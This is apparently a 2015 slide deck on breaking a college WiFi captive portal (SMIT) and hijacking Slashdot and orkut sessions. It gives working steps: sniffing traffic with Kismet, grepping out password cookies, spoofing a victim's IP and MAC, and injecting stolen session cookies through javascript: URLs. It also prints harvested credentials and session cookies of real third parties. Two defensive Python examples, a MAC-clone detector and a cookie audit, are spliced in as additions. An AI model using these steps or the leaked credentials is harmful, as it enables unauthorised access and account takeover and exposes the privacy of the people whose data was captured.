Date posted: 25-May-2015 | Category: Technology
Down the rabbit-hole
a sneak peek at the SMIT-WiFi implementation
Amit Saraff, Ashish Shekhar
Tools Used
• Nmap – network scanner
• Wireshark / Ethereal – packet analyzer
• Kismet – wireless sniffer
• BurpSuite – proxy (HTTP header modifier)
• Firefox – web browser
 – Live HTTP Headers
 – User Agent Switcher
 – Tamper Data
 – View Cookie CS
 – NoScript
• Unix tools – wget, curl, ssh, ifconfig etc.
• Intel Centrino-based laptop running Slackware 9
Brief Overview
• IP Range: 172.16.183.0/22
• WEP / WPA – no (yes !!)
• 4 different ESSIDs:
 – SMITWiFi1
 – SMITWiFi2
 – SMITWiFi3
 – SMITWiFi4
 – different ESSIDs / same channel ??
Brief Overview (cont..)
• 172.16.183.1 – router / DNS resolver / authenticator
• 172.16.183.2 – 802.11b Access Point
• 172.16.183.3 – D-link DWL-900 AP+ (standard 802.11bg ap)
• 172.16.183.4 – (new) Another access-point ?
Initial Monitoring
• E-mail accounts
 – [email protected]
 – [email protected]
 – [email protected]
 – [email protected]
 – [email protected]
 – [email protected]
 – [email protected]
 – [email protected]
Initial Monitoring (cont..)
• and web addresses
 – www.orkut.com
 – www.cisco.com
 – www.wipro.com
 – www.musicgamesrefer.com
 – www.grisoft.com
 – www.yahoo.com
 – And some more orkut !!
But that's not what we are looking for !!
Wall of Sheep
IP              MAC                User   Password
172.16.183.15   00:12:f0:db:ef:6f  d205a  m_-_-i
172.16.183.23   00:12:f0:64:0a:67  g205a  b_-_i
172.16.183.78   00:13:ce:7b:d7:9b  d108a  1_3
172.16.183.116  00:16:ce:54:69:48  b206a  j_-n
172.16.183.117  00:12:f0:56:b7:3f  k205a  n_-_-_-w
172.16.183.149  00:15:00:22:c4:0f  l205a  p_-_-_-_4
172.16.183.155  00:13:02:43:2b:0d  r305a  r_-_-_a
172.16.183.180  00:12:f0:51:3b:e0  j301a  h_-_-_-a
** and this is just a small part of the list
How about some user account details?
So how did this happen ?
172.16.183.1 – Authentication Server
Talk about multi-platform support
User Agent Switcher to the rescue
Background magic – how it really works
How hard is it?
• Log the network traffic using Kismet
• And run:
  strings Kismet*.dump | grep Cookie | egrep "_Pass=[a-zA-Z0-9]+;"
• to get:
Cookie: _UserName=m301a; _Pass=123; JSESSIONID=975DCC46FE52BC0A3CEFDA8E568A7293
Cookie: _UserName=r703a; _Pass=manisha; JSESSIONID=2914445C961B072A73498FDCC1CEB9AE
But that isn't very ethical
• Problem – How to get access to the internet without compromising another's account ?
• Solution – Study the entire process and find a work-around.
Brief Introduction to Cookies
No not these “cookies”
So what are they ?
• Parcels of text sent by a server to a web-browser and then sent unchanged back by the browser each time it accesses the server.
• Used for authenticating, tracking and maintaining specific information about users.
• We saw an example 2-3 slides back.
 – For those who “missed it” here it is again:
Cookie: _UserName=m301a; _Pass=123; JSESSIONID=975DCC46FE52BC0A3CEFDA8E568A7293
How do they help?
• The SMIT server sets a cookie on each client it authenticates.
• Refreshes it every 180 seconds.
• How do I then get this cookie?
• And how will it help even if I do manage to capture it?
Step 1
Find active hosts on the network: enter 'Kismet'
Step 1 (cont..)
Step 2
Select an active host and note its parameters, i.e. IP address and MAC address.
Step 2 (cont..)
Change settings locally to match the host about to be compromised.
For eg:
ifconfig eth1 172.16.183.209 hw ether 00:13:02:C1:28:D4
route add default gw 172.16.183.1
Step 3
• Fire up your browser – Firefox in our case.
• Type in the following URL :
http://172.16.183.1/24online/webpages/clientlogin.jsp?loginstatus=true&logoutstatus=null&message=&liverequesttime=180&livemessage=null&url=&isAccessDenied=null&fromlogout=null
• This acts as a 'refresh' command to the server which replies back with the validated cookie.
..to get
..and we are online
Step 3 (cont..)
• What this does:
 – Sets you up with the “cookie”
 – Refreshes itself every 180 seconds
 – Voila, you have free internet access (until the guy logs off / you log him off)
• Node goes offline?
 – Rinse and repeat the entire process with another IP.
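The portal re-validates a session from nothing more than the client's IP and MAC address, which is why matching those two values in Step 2 is all it takes. From the defender's side, the clone leaves a trace that the portal itself never looks at: two radios transmitting under one MAC each keep their own 802.11 sequence counter, so the merged stream seen by a monitor keeps jumping backwards. The following detector is an added example written for this page, not code from the presentation or from Kismet; the frame metadata is constructed and the MACs are locally-administered placeholders.

```python
from collections import defaultdict

SEQ_MODULO = 4096  # 802.11 sequence numbers are 12-bit and wrap around

# Constructed sample of frame metadata: (timestamp, source MAC, sequence number).
# 02:00:00:00:00:01 is a single radio counting 100, 101, 102, ...
# 02:00:00:00:00:02 is two radios sharing one MAC: one counts from 100, the other from 700.
SAMPLE_FRAMES = [
    (0.00, "02:00:00:00:00:01", 100),
    (0.01, "02:00:00:00:00:01", 101),
    (0.02, "02:00:00:00:00:01", 101),  # retransmission: same sequence number, not a regression
    (0.03, "02:00:00:00:00:01", 102),
    (0.04, "02:00:00:00:00:01", 104),  # small forward gap (lost frame) is normal
    (0.05, "02:00:00:00:00:02", 100),
    (0.06, "02:00:00:00:00:02", 700),
    (0.07, "02:00:00:00:00:02", 101),
    (0.08, "02:00:00:00:00:02", 701),
    (0.09, "02:00:00:00:00:02", 102),
    (0.10, "02:00:00:00:00:02", 702),
    (0.11, "02:00:00:00:00:02", 103),
]


def backward_distance(prev_seq, seq):
    """How far `seq` lies behind `prev_seq` on the 12-bit counter (0 if equal or ahead)."""
    ahead = (seq - prev_seq) % SEQ_MODULO
    if ahead <= SEQ_MODULO // 2:
        return 0  # in order, a retransmission, or a forward gap
    return SEQ_MODULO - ahead


def count_sequence_regressions(frames, tolerance=3):
    """Per-MAC count of backward jumps larger than `tolerance` in the sequence counter.

    One radio yields a nearly monotonic counter; two radios under the same MAC yield
    two interleaved counters, so the merged stream regresses on almost every frame.
    """
    last_seq = {}
    regressions = defaultdict(int)
    for _ts, mac, seq in sorted(frames):
        if mac in last_seq and backward_distance(last_seq[mac], seq) > tolerance:
            regressions[mac] += 1
        last_seq[mac] = seq
    return dict(regressions)


def suspected_clones(frames, tolerance=3, min_regressions=3):
    """MACs whose counter regressed at least `min_regressions` times, sorted."""
    counts = count_sequence_regressions(frames, tolerance)
    return sorted(mac for mac, n in counts.items() if n >= min_regressions)


if __name__ == "__main__":
    for mac in suspected_clones(SAMPLE_FRAMES):
        print(f"possible MAC cloning: {mac} seen with interleaved sequence counters")
```

The tolerance absorbs the minor reordering and retransmissions a single station produces; the threshold keeps a one-off glitch from raising an alert. Feeding it real monitor-mode captures means extracting the source address and sequence-control field per frame, which the example leaves to whatever capture tool is in use.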
Return to cookie-land
• Authentication mechanisms
 – We just saw an abuse of the implicit trust mechanism guaranteed by cookies
 – But that was local
 – Can it be extended to other sites too?
Presenting Slashdot
• Popular technology portal.
• News site for anything regarding Technology / Linux / Politics / Science / YRO – Your Rights Online and more.
• Uses HTTP-POST mechanism for sending authentication data.
The main page
Login page
Cookie
Exploit -
• To authenticate as that user simply capture the incoming cookie
• Then in the address-bar type in:
javascript:document.cookie='user=609178::Ik2zsyezqK6AIER7rLuyD7; Domain=.slashdot.org; Path=/';
Result ?
So what ?
But then that is hardly any sweat !!
Moving on - orkut.com
• What is orkut?
 – Social networking site.
 – Online community to meet new people and keep in touch with old ones.
 – Now part of the Google empire.
 – On in “at least” 15 of the 20 or so computers in the campus cyber-cafe at any time of the day.
Main page.
First observations.
• Note – The address-bar is yellow and there is a lock-sign on the taskbar.
 – What it means:
  • Site uses Secure-HTTP (Port 443 / https)
  • Certificate for validation (AES-256 bit encryption)
  • Trusted certificate issuer – Thawte Consulting cc.
 – Actual login frame URL:
https://www.google.com/accounts/ServiceLoginBox?service=orkut&nui=2&uilel=1&skipvpage=true&msg%3D0%26page%3Dhttp%253A%252F%252Fwww.orkut.com%252F&followup=https%3A%2F%2Fwww.orkut.com%2FGLogin.aspx&hl=en-US
In other words – that information is definitely not being cracked anytime soon.
Cookies, again?
• Cookie generated on login :
Cookies, again ? (cont..)
• 2 cookies set by the orkut domain
 – First one seems to be a user preference cookie
 – Second one is for timezone (??)
Cookie (1)
• Question : Does Cookie 1 alone do the trick then ?
• Solution : Grab another cookie and check.
Back to kismet dumps
• Hunt for a cookie in the previous gathered logs.
strings Kismet-*dump | grep Cookie | grep -i orkut
• To get:
Cookie: orkut_state=ORKUTPREF=ID=7252002680339005281:INF=0:SET=111236439:LNG=1:CNT=91:RM=0:USR=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:PHS=:TS=1158132779:LCL=en-US:NET=1:TOS=2147483647:GC=DQAAAG8AAADkOy-V63iFe2aPbuAmCA-bDDU8_u94QUeUQfxAz3MzhkADniO0_SDGMp8ny5x-FwbOCrbZ_JGLohyBxL3Xkuxf3AbdmSE7TNsC3xCKaJM0uq8k44tQMcp51JuXfs70h-PrgMf37rc3w4_R0na3XJus:PE=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:GTI=0:GID=:S=HNmUSftD+sY4LAmmXVSy0U/jLIg=:
Set this cookie
javascript:document.cookie='orkut_state=ORKUTPREF=ID=7252002680339005281:INF=0:SET=111236439:LNG=1:CNT=91:RM=0:USR=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:PHS=:TS=1158132779:LCL=en-US:NET=1:TOS=2147483647:GC=DQAAAG8AAADkOy-V63iFe2aPbuAmCA-bDDU8_u94QUeUQfxAz3MzhkADniO0_SDGMp8ny5x-FwbOCrbZ_JGLohyBxL3Xkuxf3AbdmSE7TNsC3xCKaJM0uq8k44tQMcp51JuXfs70h-PrgMf37rc3w4_R0na3XJus:PE=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:GTI=0:GID=:S=HNmUSftD+sY4LAmmXVSy0U/jLIg=:; Domain=.orkut.com; Path=/';
To get :
Notice self-post!
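The three cookies in this deck fail in the same two ways: the SMIT portal cookie carries the password itself (and re-sends it every 180 seconds), and the Slashdot and orkut session cookies are sent over plain HTTP even though the login happened over HTTPS, so one sniffed request is a complete session. Both are things a defender can check mechanically from captured headers. The audit below is an added example written for this page, not code from the presentation; every header in it is a constructed placeholder, not a capture from the talk, and the attribute checks are the standard Secure / HttpOnly / SameSite cookie flags.

```python
import re

# Cookie names that suggest a credential rather than an opaque session identifier.
CREDENTIAL_NAME = re.compile(r"pass|pwd|passwd|password|secret", re.IGNORECASE)

# Constructed sample headers (placeholder values, not captured data).
SAMPLE_REQUESTS = [
    # portal-style cookie carrying the password itself, replayed over plain HTTP
    ("http", "Cookie: _UserName=user01; _Pass=hunter2; JSESSIONID=0123456789ABCDEF"),
    # opaque session id over HTTPS: nothing to flag in the request itself
    ("https", "Cookie: sid=8f1c0e3b2a9d4c7e"),
]
SAMPLE_RESPONSES = [
    # session cookie scoped to the whole domain with no protective attributes
    "Set-Cookie: user=12345::EXAMPLETOKEN; Domain=.example.org; Path=/",
    # hardened form of the same cookie
    "Set-Cookie: user=12345::EXAMPLETOKEN; Domain=.example.org; Path=/; Secure; HttpOnly; SameSite=Lax",
]


def split_header(line):
    """Return (lower-cased header name, value) for a 'Name: value' line."""
    name, _, value = line.partition(":")
    return name.strip().lower(), value.strip()


def parse_pairs(value):
    """Split 'a=1; b=2; Secure' into [('a', '1'), ('b', '2'), ('Secure', None)]."""
    pairs = []
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" in part:
            k, _, v = part.partition("=")
            pairs.append((k.strip(), v.strip()))
        else:
            pairs.append((part, None))
    return pairs


def audit_request_cookie(scheme, line):
    """Issues for a captured request Cookie header seen on a connection using `scheme`."""
    header, value = split_header(line)
    if header != "cookie":
        raise ValueError("expected a Cookie header")
    names = [k for k, _ in parse_pairs(value)]
    issues = []
    for k in names:
        if CREDENTIAL_NAME.search(k):
            issues.append(f"credential-bearing cookie '{k}' (password travels with every request)")
    if scheme == "http" and names:
        issues.append("cookie sent over plaintext HTTP (replayable by anyone on the path)")
    return issues


def audit_set_cookie(line):
    """Issues for a Set-Cookie header: credential names, missing Secure / HttpOnly / SameSite."""
    header, value = split_header(line)
    if header != "set-cookie":
        raise ValueError("expected a Set-Cookie header")
    pairs = parse_pairs(value)
    cookie_name = pairs[0][0]
    attrs = {k.lower(): v for k, v in pairs[1:]}
    issues = []
    if CREDENTIAL_NAME.search(cookie_name):
        issues.append(f"credential-bearing cookie '{cookie_name}'")
    if "secure" not in attrs:
        issues.append("missing Secure (browser will also send it over http://)")
    if "httponly" not in attrs:
        issues.append("missing HttpOnly (readable from script via document.cookie)")
    if "samesite" not in attrs:
        issues.append("missing SameSite (sent on cross-site requests)")
    return issues


if __name__ == "__main__":
    for scheme, line in SAMPLE_REQUESTS:
        print(line, "->", audit_request_cookie(scheme, line) or "ok")
    for line in SAMPLE_RESPONSES:
        print(line, "->", audit_set_cookie(line) or "ok")
```

Of the three flags, Secure is the one that addresses the captures shown in this deck: a cookie the browser refuses to send over http:// never appears in a Kismet dump. HttpOnly covers theft by script rather than by sniffing, and a credential in a cookie has no fix other than replacing it with a server-side session that an opaque token refers to.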
Future possibilities ?
• Set up an HTTP server and masquerade as 172.16.183.1 in order to capture logins.
• Attack the hardware itself (vulnerabilities in the server / access-points).
• Ban certain clients from access (arp-flooding).
• Put the laptop in “Master” mode to route traffic through it.
Thank you
Questions ?